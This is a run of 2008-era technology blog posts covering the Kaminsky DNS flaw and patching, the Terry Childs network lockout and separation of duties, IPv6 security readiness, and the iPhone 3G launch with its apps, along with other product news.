Note: You can find all our podcast feeds in the table here, and you can also subscribe to get the show every week in iTunes by clicking here.

The DNS vulnerability discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.

According to Kaminsky, 52% of the DNS servers on the Internet are still vulnerable, better than the number of exploitable systems just a few weeks ago when the patches were released by all the vendors.

Kaminsky has written up a plain-language helper guide to explain the problem to non-technical (read: management and decision-making) people. There's also a Black Hat webcast with Kaminsky available where he details the vulnerability and discusses the fixes.

Read more at Ars Technica.

On the Google blog, Jesse Alpert & Nissan Hajaj posted an article today called "We knew the web was big..." which indicates Google engineers recently noted that the number of web pages on the Internet passed the one-trillion mark. That's 1,000,000,000,000 pages. For those who don't process the impact of adding that many groups of zeros at a time, think about this:

• Take 1,000 pages.
• Multiply that 1,000 times and think about just how big that is.
• Multiply that amount another thousand times, and stop to think about how big that is.
• Now, again take that huge amount and multiply it by 1,000. Now you're at a trillion pages.

That's freakin' huge, really. If you started counting from one to a trillion and counted one number per second, it would take you almost 317 centuries before you were done (and by the way I asked google to help me figure that out). That's almost 32,000 years. It almost completely boggles the mind. That's a lot of web pages.

Google also notes that every day, the number of pages on the web increases by several billion.

Alpert and Hajaj have another explanation to try to explain the sheer size of the Internet today:

Today, Google downloads the web continuously, collecting updated page information and re-processing the entire web-link graph several times per day. This graph of one trillion URLs is similar to a map made up of one trillion intersections. So multiple times every day, we do the computational equivalent of fully exploring every intersection of every road in the United States. Except it'd be a map about 50,000 times as big as the U.S., with 50,000 times as many roads and intersections.

That's really just amazing to me. Wow. And now you know why we call this the Information Age. A lot of that information may be inaccurate, pornographic or otherwise useless, but some of it's good, and the sheer immensity of it is truly awesome.

TechCrunch has a slightly different take, calling the Google post misleading. The end of the TechCrunch post alludes to some news coming next week that might turn Internet indexing on it's head. Interesting - Is there some big search engine news in the works? Is it Microsoft's BrowseRank or something else? Stay tuned.

Over at OSCON just a short time ago, the Open Web Foundation was just announced. Eran Hammer-Lahav just blogged about it at the OWF site. This is great news, and should go a long way to enabling better community development of standards and specs in a non-proprietary fashion.

This morning at OSCON, David Recordon announced the creation of the Open Web Foundation. The Open Web Foundation is an attempt to create a home for community-driven specifications. Following the open source model similar to the Apache Software Foundation, the foundation is aimed at building a lightweight framework to help communities deal with the legal requirements necessary to create successful and widely adopted specification.

The presentation slides are also available in Eran's post.

What would Steve click?

It's not often you find advertising that doesn't just bother you. I try to keep the ads on this site relevant, minimalist and out of the way. But on a limited-size device like the iPhone, not to mention it's a device that has that "cool usability" vibe, the need for ultra-careful advertising design is critical. Acceptance is important.

Enter AdMob. They've created advertising blocks for the iPhone that are - well - pretty darn cool. Hopefully the advertisements that show up in them in practice will be relevant and cool, too. Check out the video.

First, a big congrats to the guys at jkOnTheRun for their acquisition by GigaOm and their continued full-time blogging careers. Great people, and a great deal.

Kevin at jkOnTheRun posted a preview article the other day that I somehow missed until now, describing the Microsoft Live Mesh client for the Mac. It's not available yet, but Kevin was able to try it out. Previously he'd reviewed the mobile client for Live Mesh.

I've been using Live Mesh for a few months now in a limited fashion because only one of my computers at home will work (meaning only one runs a Windows desktop OS). My other machines are a Home Server and Mac, and my mobile decide is an iPhone. But I like what I have seen in the Mesh system, including the UI. So, I am looking forward to the release of a Mac client.

Check out Kevin's preview of the pre-release Mac app here.

In the case of Terry Childs, a network admin who gained notoriety recently for locking the City of San Francisco and his managers out of their own critical network, comic-book style progress has been made, with Childs' attorney inviting the mayor of SF to a secret meeting at the jail, where Childs handed over the passwords he'd previously refused to disclose.

Childs' lawyer, again in typical comic book fashion, has also come out saying that Childs' actions were essentially noble and that he was acting to protect the network he built from his management and peers, whom he characterized as being neglectful and without the proper knowledge to support the network. About what you'd expect from a defense lawyer in a public case, I suppose.

But Childs is in no way a hero. Even if what he says is completely true, he's (allegedly) committed a real crime. He does not own that network even if he helped build it, and regardless of whether the management in his department was capable of exercising its responsibilities, when Childs locked everyone out he crossed a clear line. If it was to make a point, he simply went overboard. The whole unfortunate case just smacks of ego and manic behavior.

But from arm's length the city doesn't exactly look like a helpless victim, either. Any professional management team that creates an environment where one person can control a critical and sensitive network in the manner exercised in this case has missed some of the most crucial and common-sense aspects of IT and security design. In fact, most of the time when cases of one-man-too-much-power crop up, we find that the IT staff is also responsible for security with little or no separation of duties, no checks and balances, and no controls to ensure one bad apple doesn't ruin the whole barrel.

Was Childs right? Absolutely not. Was the City wrong? I don't see how you can argue otherwise.

You'd likely be surprised how many real-world computer networks - big and small, important and less so - are run on the concept of "we just trust that one guy." It's what we call a "Beer Truck" risk problem: If I'm that guy you trust, what if I get hit by a beer truck and killed, or alternatively what if I drink everything on that beer truck and go nuts and wipe out the network? What then?

Systems should be set up to ensure no one person holds all the keys. Over the past few days I've read comments made about this story, in many cases by angry IT-types who say if you hire someone you have to give them access to everything and you have to trust them to do the right thing. Otherwise they cannot do their job, you're a terrible person and your network and systems are doomed. That premise is simply and blatantly false, and in fact following that method puts you in the same boat the City of San Francisco has just found itself in. Please, don't listen to the old-skool IT admin crowd, telling you to hand it all over to them because you obviously don't know what you're doing. Fire those guys and find some real help.

If you want a healthier view of the situation, check out articles written by smart, thoughtful people, like this one by Paul Doyle. Also, Paul Venezia wrote an in-depth article about what went wrong, with some detailed inside information.

To be clear, no one person should control all the systems. Control and authority are not the same thing. Checks and balances are important. The Air Force doesn't allow one person to perform all the steps needed to launch a ballistic missile, right? Apply the same principles to your IT systems.

Case in point: I was the chief security executive at a major online financial services company. I had administrative access to nothing. I couldn't even get in the data center without an escort and records being kept. I had no account access to critical or sensitive systems. And no one person there could make changes in a vacuum. IT workers didn't have access to security systems. Security workers didn't have administrative access to anything by default. And we operated effectively, smoothly, with full knowledge of what was happening on the network and systems. No one person had control. Authority, sure. But actual control of systems? No. To operate otherwise would have been negligent.

I often preach the value of formalizing security management and putting proper process, technology and organization in place to ensure a good, stable system that can effectively support business. One of the pillars of an effective security management system is hiring good people (probably not ones who have been convicted of aggravated robbery in the past, sorry) and separating duties in a way that protects everyone involved - employees included. Doing so is not punishment, it's just good common sense.

If nothing else, lets hope businesses and governments all over learn from this embarrassing public spectacle. There are standards out there (my background and experience is in ISO 27001, an international security management standard), the very purpose of which is to make sure things like this don't happen. It's high time to start using them.

DNS has a hole in it. Bad guys are working on exploits right now. Patches are available right now. Anyone responsible for a DNS server needs to exercise that responsibility. Right Now.

Dan Kaminsky found a security hole in DNS recently, the details of which he was keeping quiet so providers could fix and release patches and DNS server owners could get those patches deployed, in order to avoid security breaches on the Internet. His intent was to release the gory details in a couple weeks at the Black Hat conference.

But the other day word of the details inadvertently leaked out, and so now everyone responsible for a DNS system must - and I do mean must - drop what they're doing and make sure their systems are patched and safe. Failure to do so puts Internet users at risk of site fraud and hijacking.

DNS is a system that translates names you can remember (like www.greghughes.net) to especially non-memorable numerical addresses the Internet can route (such as 208.109.238.146). It's the Internet's phone book, so to speak.

The security hole allows malicious people to spoof a web site using the actual, legitimate domain name. In other words, bad guys could hijack a DNS server, and if it happens to be one your computer relys upon, you could type in a legitimate address like www.google.com or www.yourbank.com, but the web page would be a malicious one - a fake. The recently-released patches plug the hole and prevent this misuse (although it doesn't really change the underlying protocol).

Aaron Massey wrote a very good post describing the issue and it's various details. He also links to Halvar Flake, a talented reverse-engineering guy who thought the threat through and pretty much guessed it right on his blog. After Halvar's guess, another security blog that had specific knowledge of the threat details confirmed Flake's hypothesis. As a result, the threat was disclosed.

Luckily, the various creators of the DNS systems used all over the Internet released patches about two weeks ago. The real question is, have you patched your servers? This is a critical flaw - it needs to be patched immediately.

If you want to know whether the DNS server your computer relies upon is vulnerable or not, you can use the DNS Checker in the sidebar of Kaminsky's blog (as long as it remains there).

A couple weeks ago I mentioned the release of Identi.ca, a social networking/microblogging site built on an open platform and allowing federation. Today, a beta release of Twhirl, one of the more popular clients used on the Twitter microblogging service as well as a couple others, adds support for Identi.ca and includes "push" support. Many of us who have come to like Indenti.ca are very happy.

That means Twhirl doesn't have to pole (read: overwhelm) the Identi.ca servers to see if you have any new items to read. Instead the servers just let you client know there's new content and pass it along. It works using the jabber/instant messaging interface (identi.ca sends it's push messages to your jabber account, and you tell Twhirl how to log into your IM account).

This is pretty darned smart (and takes a couple steps to set up). It's something that Twitter could probably use on their service to potentially reduce load (although I cannot say for sure that a push service would actually reduce the issues related to overloading of their servers).

Read more about it at CNET or grab the latest beta of Twhirl with Identi.ca support from this link.

Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick IPv6 test on this page.

Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that when you do actually start to operate in an IPv6 world, that you are properly secured.

In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.

A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.

Kim Zetter wrote a good article on the subject the other day at WIred. "The Ghost in Your Machine: IPv6 Gateway to Hackers" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.

Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.

What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until after they need to know it. A lazy learning methodology just won't work in this case.

For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.

For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.

If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?

IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.

Now is the time. IPv6 is here, Go forth. Learn, analyze and secure.

Several years ago I remember when my boss at the time, Chris Brooks, and others at work set up and ran Terrarium, a .NET v1.0 app that allowed peer-to-peer networking of machines running code with "bugs" (not the defect kind) in a virtual environment. It was a sort of a survival-of-the-fittest-bug kind of game, and they used it at work to build some fun learning into the process.

Fast-forward a few years, and the team at Microsoft that originally built the Terrarium app has scattered to the wind. But Bill Simser, a solutions architect, avid .NET guy and Microsoft MVP for SharePoint, took the initiative to find the code inside Microsoft, update it to .NET v2.0, and released it on CodePlex for the community to use and help maintain.

It's now a client-server application and has a worldwide-participation capability (as well as single-machine and closed local peering capabilities). Pretty cool stuff.

If you're an individual, team or group that wants to get some practice or learn more about programming in .NET and you want to have some fun in the process, check out Terrarium v2.

Resources:

• Bill Simser's blog post about Terrarium v2
• Terrarium v2 on CodePlex

There's some great news out of the Microsoft Xbox crew at the E3 conference - NetFlix integration with your XBox 360:

Microsoft revealed that beginning later this year, Netflix subscribers would gain access to the entire Netflix digital library through their online XBox 360's.  Gold membership is required to take advantage of this partnership, but the newfound capacity represents a large step forward in increasing the XBox 360's appeal as a living room media box.  The present Netflix digital library includes roughly 10,000 titles, and on the 360 will feature the ability for watching videos concurrently with friends over the Internet through the new community party system.

Xbox 360 will be the only game system that lets users instantly watch movies and TV episodes streamed from Netflix. Xbox LIVE Gold members who are also Netflix subscribers will be able to streaming movies and television show episodes from Netflix at no additional cost. I'm really looking forward to that. All we need now is a Blu-Ray drive for the 360 console...

Also announced was a revamped user experience and interface (implemented completely through software updates, and allowing more personalization and social interactivity), new HD programming partners and content (including Battlestar Galactica, which I am looking forward to), a price cut on the "Pro" model of the Xbox 360 and a new model slated for August, a future feature which will allow you to copy your game disk to the Xbox hard drive for faster loading and smoother play (you still need to have the original disc though), and a bunch of new games.

On TechCrunch IT, in a post called "The New Apple Walled Garden," author Nik Cubrilovic makes a good point...

TechCrunchIT » The New Apple Walled Garden

Geeks and enthusiasts wearing Wordpress t-shirts, using laptops covered in Data Portability, Microformats and RSS stickers lined up enthusiastically on Friday to purchase a device that is completely proprietary, controlled and wrapped in DRM. The irony was lost on some as they ran home, docked their new devices into a proprietary media player and downloaded closed source applications wrapped in DRM.

I am referring to the new iPhone - and the new Apple iPhone SDK that allows developers to build ‘native’ applications. The announcement was greeted with a web-wide standing ovation, especially from the developer community. The same community who demand all from Microsoft, feel gifted and special when Apple give them an inch of rope. When Microsoft introduced DRM into Media Player it was bad bad bad - and it wasn’t even mandatory, it simply allowed content owners a way to distribute and sell content from anywhere.

How can people who preach and pontificate open systems be so enamored with a completely closed, proprietary system as Apple's? Now, don't get me wrong. I was in line at an Apple store last week with all the people Nik talks about in his article. I really like the iPhone and I think my Mac is great, hardware-wise (okay, the OS is not too bad either). But there's something that's always lurking there in the back of my mind, like a pestering little voice that doesn't want me to give in or forget lessons of the past. "A closed system is a system doomed to fail," the voice tells me. Either that, or it is so limiting as to stifle. Or both. Maybe I need to get my medication checked. On the other hand, maybe the voice is right. Or both.

Risking cliche cynicism, I think one has to consider whether The Church of The Steve congregation is further developing (or devolving, if you prefer) in its adoration, at the expense of long-term good. Blind faith, crazed unthinking people saying one thing yet doing another, the how-dare-you-question mentality... Sounds familiar. And that's coming from an Episcopalian. An imperfect, sometimes-questioning, sometimes-doubting, cynical one -- But you get the point. I hope.

Perhaps the scariest part of my thought process today is that I actually agree completely with Dave Winer on this one. He nails it right on the head. Okay, there are times when I agree with Dave, but until now I've never really admitted it in public. :)

What do you think about Apple's model? Fanboy? Concerned? Who cares? End of the world as we know it? Utopia? Told-ya-so?

You can spend literally minutes (many of them) watching Gary Busey comment on various aspects of business and entrepreneurialism, and laughing in the process. Awesome. Highly recommended, since Gary is one of my favorites. You can click the buttons at the bottom of the video screen to get to different sections, each with several "episodes."

And by the way, the gotvmail service this video series is meant to virally market is pretty great, too. You might want to check that service out if you need a more-formal call-handling system for your smaller-sized business but don't want to shell out the money to buy all the classic PBX hardware. Great for distributed teams and virtual offices, too.

I know this isn't exactly a new thing, but as I was installing the IE8 Beta 1 for x64 architecture on a computer today to do some testing, I felt a warm-fuzzy sense of appreciation for the fact that more and more we are seeing software that checks for patches and updates before installing and running for the first time. It makes for more-secure system, which is nothing but good.

No matter what you think of Internet Explorer (and for the record/what it's worth, I like it quite a bit these days), you have to admit the safer installation process is a great improvement.

Gizmodo has a good article highlighting the analysis of the iPhone 3G's battery life (some loose methodology, and some only slightly more formal) by nine industry pundit sources. All I can add to the info is that it's good to burn the batteries in for a week with full charges and discharges (even in the modern battery world) before one can really experience accurate results (batteries tend to need a couple good cycles to provide optimum output).

The general consensus? No 3G phone on the market has great battery life, but in the grand scheme of suckiness, the iPhone 3G's battery life suck the least. Forgive the terminology, please. Just trying to make a point. :)

"One takeaway seems to be that as far as straight-up 3G talk time goes, the iPhone 3G is near the top of the range—Wirelessinfo and PC World both found it to be among the best 3G handsets they've tested for voice talk time. For mixed use and browsing numbers, the range is pretty wide, since the variables at play are nearly infinite."

I know a couple people who run so many programs at once on their laptops, they might just be able to take advantage of the new quad-core mobile processor from Intel, which is apparently coming next month. But I have to wonder - since those are the same people that will scream about battery life - how practical it would be. It will be interesting to see how they perform.

At any rate, looks like it's coming in August (and it ain't exactly cheap - see the story for more info).

"We're bringing quad-core to mobile in August," said Sujan Kamran, regional marketing manager for client platforms at Intel in Singapore. Kamran declined to disclose specifics of the quad-core chip, which will carry Intel's Core 2 Extreme moniker.

Link: Intel's Quad-core Mobile Chip Coming Next Month - Yahoo! News

Wow. The numbers are really huge. Apple has released figures for it's "opening weekend" box office smash, the iPhone 3G. One million units sold in the first three days. It took 74 days to sell that many of the original iPhone last year.

No wonder activation in the stores was so sluggish (or at times just broken). Big uptake in the USA, plus 20 other countries on opening weekend.

A quick note about analyst reports that preceded Apple's announcement. "There are three kinds of lies: lies, damned lies, and statistics." For the record, Piper Jaffray analyst Gene Munster said Monday that Apple was not going to meet even the half-million sales mark expectation set by the marketplace for the opening weekend. Boy, was he ever wrong.

In addition to the huge iPhone sales, Apple also announced that more than 10 million apps were downloaded from the iTunes App Store in the same time period. I wonder how many of those were paid for, how many were free, and what kind of revenue for Apple and authors we're talking about.

Very. Smart. Company. Not perfect, but that don't need to be. They take chances. Big ones. Laser-focused, too, and always successfully defining ahead of time what is "right" and then delivering (which, by the way, is much easier to do than letting someone else define "right" and then trying to meet those expectations).

This morning I signed up for a hosted Exchange Server 2007 account with the 4iphone.net service provided by 4smartphone.net, an early provider of push-iPhone service using the ActiveSync capabilities of Exchange. I'm up and running with my new iPhone on their Exchange server now with my own domain name, and I can tell you already I am just a couple steps away from migrating my email from Google Apps to 4smartphone.net.

To put it simply, Exchange Server 2007 rocks, and so does the new iPhone and its updated software. But when you put them together, you get the ol' 2+2=5 effect. The greater value of each piece of technology is truly realized when used in concert.

Note, too, that hosted Exchange customers get a free copy of Outlook 2007 (for the PC) or Entourage 2008 (for the Mac). There's no need to buy a copy. The client license is part of the hosted Exchange license. That alone is a substantial value.

Setup was fairly straightforward, although some of the configuration instructions were a little vague and complicated to decipher at first (see below). But as of now I'm receiving and able to send email on both my Google apps and Exchange mail servers - with no changes to my DNS settings required. So, it's super-easy to evaluate and try-out the Exchange hosting. Add the 15-day free trial (they'll reimburse if you decide not to keep the service running), and it's a zero-risk evaluation.

Note that when you set up the account at 4smartphone.net, you will initially be logged into their Account Manager, which is where you configure your domain(s) and users/mailboxes. In this interface, the information provided to set up your ActiveSync users is a little vague (specifically, the format of the user name is not intuitive). You can, however, find the complete details of what you need to configure your account when you log into their "Mailbox Manager" web app. In that interface, you'll navigate to Setup > ActiveSync > Instructions and there find exactly what you need.

Delivery with push technology on exchange reminds me of my Blackberry days - within seconds of arriving on the server, email hits the mobile device. Since I got my first iPhone I've always felt a little sluggish when it comes to receiving email. No more: The first time email arrived in Entourage on my Mac and on the iPhone at the same time - practically instantly - I realized what I've been missing.

Combined with the usability and terrific functionality of the 3G network and iPhone 2.0 software and it's just a little too much to describe. It just works, it works well, and it is usable to the point of not having to think about it -- the ultimate test for a usability engineer.

After setting up the email flow and making sure it all works, I used Entourage to copy all my contacts and calendar items to the Exchange server, then enabled syncing of that information from Exchange to the iPhone.

I'll post more after I've had a little more hands-on experience, but so far so great. Highly recommended, and with 4smartphone.net and companies like them, Exchange is available instantly to individuals and small groups or businesses, not just big companies.

I'm officially the proud and happy owner of a white 16GB iPhone 3G. I'm about to head out to the store to take care of all the other stuff I need to get done today, so I will have a chance to check out the GPS and 3G network stuff shortly.

I arrived at about 7am at the Apple Store at the Flat Iron Crossing mall in Broomfield, Colorado. About 150 people were already there by the time I arrived, and the numbers just kept on adding up as the morning wore on.

There were a lot of first-time-iPhone-purchasers as well as upgraders in line. I figured it was about a 50-50 mix. The Apple store staff said they had lots of iPhones in stock. At 8am, an army of crazed, screaming Apple Store employees came running from the parking lot where they'd staged themselves, past the crowded line and into the store, trying for high-fives along the way. It was the most excited group of retail workers I've ever seen, to be certain.

The iPhone-stock situation at the Apple stores, however, contrasted drastically with what we were hearing on Twitter about the people in line at the AT&T stores, where stock on hand seemed to be very limited and lines were also long. Word was each AT&T store had about 60 phones or so. Not so at Apple stores, where managers said they had enough to cover the crowds.

Almost as soon as 8am rolled around things went south. The first of the line moved into the store and shortly after is when things stopped. Rumors started to trickle out that the activation system was failing. The situation improved somewhat, until an hour later when the system again failed (likely as a result of the west cost stores opening). The store manager came out to address the crowd and explained the situation (quite effectively, I might add - Apple has a great crew at the store I visited), telling us what was happening with surprising transparency and apologizing for the delay. He thanked us for waiting and our "dedication," and came back out to give updates. At about 10am local time, the situation improved substantially and people started getting their phones in a more-timely manner.

As it turned out, we were not leaving the store with fully activated iPhones as expected. In fact, I got mine at 10:55 a.m., but when I walked out of the store it was still sealed in the plastic-wrapped box. Apparently Apple decided to ditch the in-store iTunes activation dance and instead started sending people home to activate their new devices on iTunes themselves. Good call. In the store they took my information and changed my service over with AT&T, which went smoothly (go figure - AT&T's money grab was slick as snot, heh). My old iPhone went out-of-service with AT&T about 20 minutes later and I so was without a phone until I could get back home to activate the new one.

There were around 200 people in line when I left. Good thing the process was moving faster.

At home, I was able to activate my new phone in less than 30 minutes. It took a while for iTunes to make its initial connection, but once that happened it was a quick and painless process. No bricked phone or anything, and after restoring my backup from the old iPhone I was all set.

Bonus info: I got an email from Telenav this morning explaining they're working now on an iPhone version of their GPS mapping software - Quite excellent! That mean we'll soon have high-quality, turn-by-turn GPS navigation on the iPhone before too long! No delivery dates or other promises (of course), but the app is in the development process. Details are at Gizmodo, and the Telenav blog is a good place to keep your eyes open for future information.

I arrived in Colorado this afternoon, plugged in my iPhone, backed it up, installed iTunes 7.7 and grabbed the iPhone v2.0 software from Apple's servers (it's out there, although iTunes is not yet advertising it here). I found the Apps listings in iTunes and decided it was about time to upgrade. So, I hooked up the iPhone and promptly fell asleep on the couch while it did it's thing upgrading.

I woke up to the sound of "bliiihdeep!" from the phone and a little "thunk" as it slid on the countertop from where I had it propped up against my Macbook Air (strategically placed so a vibration would make it move, hence alerting me to activity during the lengthy upgrade process). I went to the phone, restored the backup from iTunes, and BAM! There I was, iPhone 2.0 software ready to go.

Once I jumped onto the wireless network at the house, I launched the app store and started looking at programs. The first one I tried was Twitterific. It's pretty okay, but all else being equal I wish I still had Twinkle on there as an app. I'm sure it will be available soon enough.

I installed Google's search app (very cool), the Paypal app (kinda cool, very spartan), and the Weatherbug ap (because those guys rock and their screenshot actually looked interesting - and it's a great little app). Last, I found the Pandora app.

Now, I have written about Pandora here before, long long ago. It's just as amazing a service today as it was then. Simply put, you start pff by providing an artist or two or three that you like and Pandora starts playing music of a similar nature that it "thinks" you'll like. You can vote individual songs/pieces up or down and it refines its recommendations. And Pandora's app on the iPhone let me log into my Pandora account instantly, within seconds, and literally ten seconds later it was streaming my music channels to me over the air.

Incredibly usable, simple, effective. Pure usability bliss.

I showed it to my mom. She instantly lit up and said, I quote: "Wow!" The thing about Pandora is I can explain it to anyone in about 20 seconds and they always "get it." They've done something - perhaps everything - right.

That made me think. My mom just found out she will have to be spending some substantial time in the hospital soon. When I showed her the Pandora application, after she showed her sense of amazement, she got pained look on her face and asked me if I would show her how to transfer files to her (crappy) MP3 player. The device is next to unusable. Even I have a hard time getting it to work. There's nothing good about it. So, tomorrow when I am out picking up a new iPhone 3G, I'm going to grab an iPod touch for my mom. And then ship my old iPhone to my friend Chris (whose shipping address I need in order to do that BTW, hint-hint).

My wish list for more apps? I was pretty disappointed to not find a blog authoring application, something similar to Windows Live Writer but trimmed down and made for the iPhone. Maybe I just need to learn how to program this stuff, but that's a scary thought. Someone better than me must be working on a blogging app. There's a good one available in the app store for TextPad, but that doesn't really help me since I don't use that platform for my blog.

So, iPhone software v2.0 has convinced me to but an iPod Touch for my mom. Once again, the ball's been hit out of the park.

Microsoft has released Hyper-V for Windows Server 2008, which is the company's hypervisor virtualization platform. With it, you get multi-OS, highly-configurable and performant virtualized hardware capabilities on the Windows platform.

Windows Server 2008 Hyper-V, the next-generation hypervisor-based server virtualization technology, allows you to make the best use of your server hardware investments by consolidating multiple server roles as separate virtual machines (VMs) running on a single physical machine. With Hyper-V, you can also efficiently run multiple different operating systems—Windows, Linux, and others—in parallel, on a single server, and fully leverage the power of x64 computing.

For additional information, you might want to check out a RunAs Radio episode that Richard Campbell and I published back in April, when we spoke with Anil Desai on the topic of Hyper-V. Anil compared Hyper-V to ESX Server from VMWare and discussed the Microsoft offering in some detail.

You have firewalls and anti-malware system, video surveillance and monitoring systems for network traffic to and from the Internet. But look at eWeek's semi-smart list of the top ten infosec risks workers pose to your business today, and you may need to rethink your plans.

I call this a "semi-smart" list because it's practical and real-world, and doesn't assume the "standards" out there cover all the bases. But, at the same time it doesn't offer much in the way of solutions, which always frustrates me (and it misses some key points, especially related to intentional worker behavior, as opposed to neglect, and how it can substantially enhance the potential associated with these risks).

Point is, each of the items pointed out is very much worth considering and reviewing in your business security program. Just don't forget to look at them in the big-picture perspective of the business.

And now for the list:

• USB Flash Drives
• Laptops
• P2P
• Web Mail
• Wi-Fi
• Smart Phones
• Collaboration Tools
• Social Networks
• Unauthorized Software Updates
• Virtual Worlds

Pretty much every modern technical productivity enhancer. Before anyone starts screaming the alarmist song, think about not only how these things can be used for good, but also about how they could be used to to Very Bad Things.

How many of those technologies are specifically and can be proven effectively covered under your infosec policies? How many have you tested in the real world to see what your compliance profile really looks like? Could you meaningfully test for these threats, even if they were on your plan?

You can check out the eWeek article here.

Google Talk is now available on the iPhone in the Safari browser. At the Google Mobile blog, the details are laid out. If you use Google Apps for your domain and have the Talk app activated there, word is you can access it, too using this URL syntax:

http://hostedtalkgadget.google.com/a/yourdomain/talkgadget/m

"We've just released in the US a new version of Google Talk designed specifically for the iPhone and iPod Touch browsers. In addition to sending your friends Gmail messages from your iPhone, you can now chat with them while you're on the move, too! In your iPhone browser, just go to www.google.com/talk, sign in and start chatting. That's it. Google Talk runs entirely in the browser so there's no need to download or install anything."

Announcement: Official Google Mobile Blog: Google Talk for the iPhone

Tired of relying on well-funded commercial software companies testing their software on you while you come to truly rely on it, with little to no control?

Well, the world is (potentially) changing.

If you're - for example - a Twitter user, you might be interested in checking out Identi.ca, a brand-new open-source platform for microblogging. Press release below.

I can be found at http://identi.ca/greghughes - Check it out.

Control Yourself, Inc. launches Identi.ca, the Open Microblogging Service (July 2nd, 2008)

Montreal, Quebec-based Control Yourself, Inc. today launched Identi.ca, the open microblogging service. Users can post short messages about themselves to Identi.ca, which are then broadcast to friends in their social network using instant messages (IM), RSS feeds, and the Web.

Identi.ca is similar to existing microblogging sites such as Twitter, Jaiku, or Pownce. Unlike those services, Identi.ca’s underlying software is available under an Open Source license. Identi.ca is also the first service to support OpenMicroBlogging, a standard for exchanging short messages between microblogging sites. Identi.ca also makes public user data available under a Creative Commons license in standard formats.

“Too many existing social networks keep users locked in to their services,” says Evan Prodromou, president of Control Yourself. “With an Open Source code base, and support for standard data exchange formats, we are giving users back the autonomy to control their own social Web presence.”

Response from initial testers has been enthusiastic, both for the software’s design and functionality, as well as the site’s openness. “It makes me feel alive again to see the resurgence of free/open on the web,” said Jon Phillips, Community Manager with Creative Commons in San Francisco, CA.

Control Yourself will grow the service exponentially throughout 2008, adding features such cell phone text messaging (SMS) and multilingual support in its next software release.

Link to the original press release: Control Yourself

Microsoft will soon be selling it's Office suite, along with security protection software (OneCare) and a slew of other applications for a $70 annual fee under the name "Equipt" this month. This is the first time a consumer has had the option to pay-as-you-go for the Microsoft productivity software, and will likely open up the possibility of a more budget-affordable option for many. When you consider an annual OneCare subscription runs you $50 a year and a copy of Office Home and Student Edition sells for a one-time fee of $150 (and a new version seems to come out every three years on average), it's an attractive deal. The $69.99 subscription fee will let you install the software on up to three home PCs.

Infoworld:

Equipt, which was formerly known by its code name, Albany, includes Office Home and Student 2007, Windows Live OneCare, Office Live Workspaces, Windows Live Mail, Live Messenger and Live Photo. Microsoft plans to begin selling it in the U.S. on July 15 through Circuit City, with other outlets to follow. It will be offered in other countries at about the same time, though pricing elsewhere was not announced.

The name comes from the idea that the package will help customers "equip their PC with a core set of services," said Bryson Gordon, a group product manager for Microsoft Office. "It resonated well with customers in testing."

Link to the Original Article at InfoWorld: Microsoft to sell Office 'value pack' for $70 per year

AT&T has released a set of informative videos (all of which appear below) with details about when, where and how to buy the iPhone 3G. Prepare to qualify!

There are three videos. The first one is for people who are not existing AT&T customers:

AT&T Inc. (NYSE:T) today announced iPhone 3G pricing for new and existing AT&T customers, several attractive voice and data plans, and tips on how to be “iReady” when iPhone 3G goes on sale at AT&T retail stores at 8 a.m. local time on Friday, July 11.

“We can’t wait to offer iPhone 3G to our customers, and we want to make sure the buying process is as easy as possible,” said Ralph de la Vega, president and CEO of AT&T’s wireless unit. “Considering all the great new features of iPhone 3G, we think our pricing and monthly plans present a tremendous value for consumers and businesses alike.”

Pricing and Eligibility

AT&T is making it easy for customers to prepare for their iPhone 3G purchase by posting “Get iReady” tips and frequently asked questions at www.att.com/iphone. The site also will include a link for customers to check their upgrade eligibility and other wireless account information.

iPhone 3G will be available for $199 for the 8GB model and $299 for the 16GB model. These prices require two-year contracts and are available to the following customers:

• iPhone customers who purchased before July 11
• Customers activating a new line with AT&T
• Current AT&T customers who are eligible, at the time of purchase, for an upgrade discount

Existing AT&T customers who are not currently eligible for an upgrade discount can purchase iPhone 3G for $399 for the 8GB model or $499 for the 16GB model. Both options require a new two-year service agreement. In the future, AT&T will offer a no-contract-required option for $599 (8GB) or $699 (16GB).

Current customers may also choose to wait until they become eligible for an upgrade discount. Eligibility is generally determined by amount of time remaining on a current contract and payment history.

Current AT&T customers who are upgrading to iPhone 3G will pay an $18 upgrade fee and new AT&T customers will pay the standard $36 activation fee.

Voice, Data and Text Messaging Plans

